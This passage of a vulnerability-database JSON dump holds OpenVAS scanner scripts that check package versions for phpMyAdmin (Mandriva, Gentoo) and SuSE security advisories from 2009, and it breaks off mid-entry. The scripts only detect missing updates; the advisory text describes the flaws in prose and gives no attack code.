value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:026 (phpMyAdmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~2.11.9.4~0.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5622", "CVE-2008-4775", "CVE-2008-5621"], "description": "The remote host is missing an update to phpMyAdmin\nannounced via advisory MDVSA-2009:026-1.", "modified": "2017-07-07T00:00:00", "published": "2009-03-02T00:00:00", "id": "OPENVAS:63450", "href": "http://plugins.openvas.org/nasl.php?oid=63450", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:026-1 (phpMyAdmin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_026_1.nasl 6587 2017-07-07 06:35:35Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:026-1 (phpMyAdmin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Cross-site scripting (XSS) vulnerability in pmd_pdf.php allows\nremote attackers to inject arbitrary web script or HTML by\nusing db script parameter when register_global php parameter is\nenabled\u00a0(CVE-2008-4775).\n\nCross-site request forgery (CSRF) vulnerability in tbl_structure.php\nallows remote attackers perform SQL injection and execute arbitrary\ncode by using table script parameter (CVE-2008-5621).\n\nMultiple cross-site request forgery (CSRF) vulnerabilities in allows\nremote attackers perform SQL injection by using unknown vectors\nrelated to table script parameter (CVE-2008-5622).\n\nThis update provide the fix for these security issues.\n\nUpdate:\n\nThe previous update packages wasn't signed, this time they are.\n\nAffected: Corporate 4.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:026-1\";\ntag_summary = \"The remote host is missing an update to phpMyAdmin\nannounced via advisory MDVSA-2009:026-1.\";\n\n \n\nif(description)\n{\n script_id(63450);\n script_version(\"$Revision: 6587 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 08:35:35 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-02 19:11:09 +0100 (Mon, 02 Mar 2009)\");\n script_cve_id(\"CVE-2008-4775\", \"CVE-2008-5621\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:026-1 (phpMyAdmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~2.11.9.4~0.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5977", "CVE-2006-6942", "CVE-2008-4775", "CVE-2008-4096", "CVE-2008-5621"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200903-32.", "modified": "2017-07-07T00:00:00", "published": "2009-03-20T00:00:00", "id": "OPENVAS:63616", "href": "http://plugins.openvas.org/nasl.php?oid=63616", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200903-32 (phpmyadmin)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been discovered in phpMyAdmin, the worst of\nwhich may allow for remote code execution.\";\ntag_solution = \"All phpMyAdmin users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-2.11.9.4'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200903-32\nhttp://bugs.gentoo.org/show_bug.cgi?id=237781\nhttp://bugs.gentoo.org/show_bug.cgi?id=244914\nhttp://bugs.gentoo.org/show_bug.cgi?id=246831\nhttp://bugs.gentoo.org/show_bug.cgi?id=250752\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200903-32.\";\n\n \n \n\nif(description)\n{\n script_id(63616);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-20 00:52:38 +0100 (Fri, 20 Mar 2009)\");\n script_cve_id(\"CVE-2008-4096\", \"CVE-2008-4775\", \"CVE-2007-5977\", \"CVE-2006-6942\", \"CVE-2008-5621\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200903-32 (phpmyadmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-db/phpmyadmin\", unaffected: make_list(\"ge 2.11.9.4\"), vulnerable: make_list(\"lt 2.11.9.4\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5977", "CVE-2006-6942", "CVE-2008-4775", "CVE-2008-4096", "CVE-2008-5621"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200903-32.", "modified": "2018-04-06T00:00:00", "published": "2009-03-20T00:00:00", "id": "OPENVAS:136141256231063616", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063616", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200903-32 (phpmyadmin)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been discovered in phpMyAdmin, the worst of\nwhich may allow for remote code execution.\";\ntag_solution = \"All phpMyAdmin users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-2.11.9.4'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200903-32\nhttp://bugs.gentoo.org/show_bug.cgi?id=237781\nhttp://bugs.gentoo.org/show_bug.cgi?id=244914\nhttp://bugs.gentoo.org/show_bug.cgi?id=246831\nhttp://bugs.gentoo.org/show_bug.cgi?id=250752\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200903-32.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63616\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-20 00:52:38 +0100 (Fri, 20 Mar 2009)\");\n script_cve_id(\"CVE-2008-4096\", \"CVE-2008-4775\", \"CVE-2007-5977\", \"CVE-2006-6942\", \"CVE-2008-5621\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200903-32 (phpmyadmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-db/phpmyadmin\", unaffected: make_list(\"ge 2.11.9.4\"), vulnerable: make_list(\"lt 2.11.9.4\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0125", "CVE-2008-2383", "CVE-2008-3197", "CVE-2008-5902", "CVE-2008-1924", "CVE-2009-0034", "CVE-2009-0135", "CVE-2008-5907", "CVE-2008-5432", "CVE-2008-2960", "CVE-2008-5824", "CVE-2008-4326", "CVE-2009-0136", "CVE-2008-5904", "CVE-2008-1567", "CVE-2008-1149", "CVE-2008-5903", "CVE-2008-4309", "CVE-2009-0126", "CVE-2008-4096", "CVE-2008-5081", "CVE-2008-5621"], "description": "The remote host is missing updates announced in\nadvisory SUSE-SR:2009:003. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.", "modified": "2017-07-11T00:00:00", "published": "2009-02-02T00:00:00", "id": "OPENVAS:63304", "href": "http://plugins.openvas.org/nasl.php?oid=63304", "type": "openvas", "title": "SuSE Security Summary SUSE-SR:2009:003", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sr_2009_003.nasl 6668 2017-07-11 13:34:29Z cfischer $\n# Description: Auto-generated from advisory SUSE-SR:2009:003\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SR:2009:003. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.\";\n\ntag_solution = \"Update all out of date packages.\";\n \nif(description)\n{\n script_id(63304);\n script_version(\"$Revision: 6668 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:34:29 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-02 23:28:24 +0100 (Mon, 02 Feb 2009)\");\n script_cve_id(\"CVE-2008-3197\", \"CVE-2008-5081\", \"CVE-2008-5432\", \"CVE-2008-1149\", \"CVE-2008-5824\", \"CVE-2008-5903\", \"CVE-2008-5902\", \"CVE-2008-5907\", \"CVE-2008-5904\", \"CVE-2008-1567\", \"CVE-2009-0125\", \"CVE-2009-0126\", \"CVE-2008-4326\", \"CVE-2008-4309\", \"CVE-2008-2960\", \"CVE-2008-5621\", \"CVE-2008-2383\", \"CVE-2008-1924\", \"CVE-2009-0034\", \"CVE-2009-0136\", \"CVE-2008-4096\", \"CVE-2009-0135\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Summary SUSE-SR:2009:003\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"amarok\", rpm:\"amarok~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-lang\", rpm:\"amarok-lang~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-libvisual\", rpm:\"amarok-libvisual~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-xine\", rpm:\"amarok-xine~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-yauap\", rpm:\"amarok-yauap~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi\", rpm:\"at-spi~1.24.0~2.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi-devel\", rpm:\"at-spi-devel~1.24.0~2.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi-doc\", rpm:\"at-spi-doc~1.24.0~2.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi-lang\", rpm:\"at-spi-lang~1.24.0~2.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"attr\", rpm:\"attr~2.4.43~2.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile\", rpm:\"audiofile~0.2.6~140.18.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile-devel\", rpm:\"audiofile-devel~0.2.6~140.18.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"autofs\", rpm:\"autofs~5.0.3~82.28.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi\", rpm:\"avahi~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-howl-devel\", rpm:\"avahi-compat-howl-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-mDNSResponder-devel\", rpm:\"avahi-compat-mDNSResponder-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-utils\", rpm:\"avahi-utils~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"backup-manager\", rpm:\"backup-manager~0.1.0~13.12.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"backup-manager-lang\", rpm:\"backup-manager-lang~0.1.0~13.12.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-chrootenv\", rpm:\"bind-chrootenv~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-doc\", rpm:\"bind-doc~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"brasero\", rpm:\"brasero~0.8.3~1.18.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"brasero-doc\", rpm:\"brasero-doc~0.8.3~1.18.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"brasero-lang\", rpm:\"brasero-lang~0.8.3~1.18.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~145.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"crash\", rpm:\"crash~4.0.7.4~8.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"crash-devel\", rpm:\"crash-devel~4.0.7.4~8.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"crash-doc\", rpm:\"crash-doc~4.0.7.4~8.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"crash-sial\", rpm:\"crash-sial~4.0.7.4~8.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-main-menu\", rpm:\"gnome-main-menu~0.9.11~22.9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2\", rpm:\"gtk2~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-branding-upstream\", rpm:\"gtk2-branding-upstream~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-devel\", rpm:\"gtk2-devel~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-doc\", rpm:\"gtk2-doc~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-lang\", rpm:\"gtk2-lang~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"hal\", rpm:\"hal~0.5.12~10.12.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"hal-devel\", rpm:\"hal-devel~0.5.12~10.12.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libattr\", rpm:\"libattr~2.4.43~2.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libattr-devel\", rpm:\"libattr-devel~2.4.43~2.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-client3\", rpm:\"libavahi-client3~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-common3\", rpm:\"libavahi-common3~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-core5\", rpm:\"libavahi-core5~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-devel\", rpm:\"libavahi-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-glib-devel\", rpm:\"libavahi-glib-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-glib1\", rpm:\"libavahi-glib1~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-gobject-devel\", rpm:\"libavahi-gobject-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-gobject0\", rpm:\"libavahi-gobject0~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-ui0\", rpm:\"libavahi-ui0~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdns_sd\", rpm:\"libdns_sd~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libhowl0\", rpm:\"libhowl0~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8h~28.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8h~28.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng-devel\", rpm:\"libpng-devel~1.2.31~4.35.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng3\", rpm:\"libpng3~1.2.31~4.35.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng12-0\", rpm:\"libpng12-0~1.2.31~4.35.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.7.1~8.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.7.1~8.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2-doc\", rpm:\"libxml2-doc~2.7.1~8.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mailman\", rpm:\"mailman~2.1.11~8.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8h~28.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8h~28.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"perl-Bootloader\", rpm:\"perl-Bootloader~0.4.81.1~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"plotutils\", rpm:\"plotutils~2.5~197.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pure-ftpd\", rpm:\"pure-ftpd~1.0.21~182.32.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-avahi\", rpm:\"python-avahi~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.6.9p17~10.36.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"tsclient\", 